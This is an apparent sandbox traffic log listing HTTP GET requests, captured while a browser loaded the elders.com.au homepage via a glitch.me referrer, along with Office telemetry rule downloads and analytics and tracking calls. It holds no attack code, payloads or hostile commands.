Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /libs/granite/csrf/token.json HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZynRTwAAAMtunQN- HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=50828223440744139920245021373270661928
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-977e7ec6e7e29a59f7dfd9cd0ac2f4b3-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s87866206656359?AQB=1&ndh=1&pf=1&t=5%2F10%2F2024%203%3A3%3A25%202%20300&mid=55744627521858828850627066940577006981&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=55744627521858828850627066940577006981&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1 HTTP/1.1Host: eldersrural.sc.omtrdc.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/two_staff_members_with_client_by_ute.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/logos/Red_logo.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /libs/granite/csrf/token.json HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _clck=1d0trzd%7C2%7Cfqm%7C0%7C1770; AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; _fbp=fb.2.1730793804748.70395038985089435; affinity="14b7d00527153a43"; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; s_cc=true; _clsk=nd89pf%7C1730793805857%7C1%7C1%7Cw.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20033%7CMCMID%7C55744627521858828850627066940577006981%7CMCAAMLH-1731398604%7C6%7CMCAAMB-1731398604%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730801004s%7CNONE%7CMCSYNCSOP%7C411-20040%7CvVersion%7C5.5.0
Source: global trafficHTTP traffic detected: GET /ibs:dpid=411&dpuuid=ZynRTwAAAMtunQN- HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=50828223440744139920245021373270661928; dpm=50828223440744139920245021373270661928
Source: global trafficHTTP traffic detected: GET /b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s87866206656359?AQB=1&ndh=1&pf=1&t=5%2F10%2F2024%203%3A3%3A25%202%20300&mid=55744627521858828850627066940577006981&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=55744627521858828850627066940577006981&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1 HTTP/1.1Host: eldersrural.sc.omtrdc.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
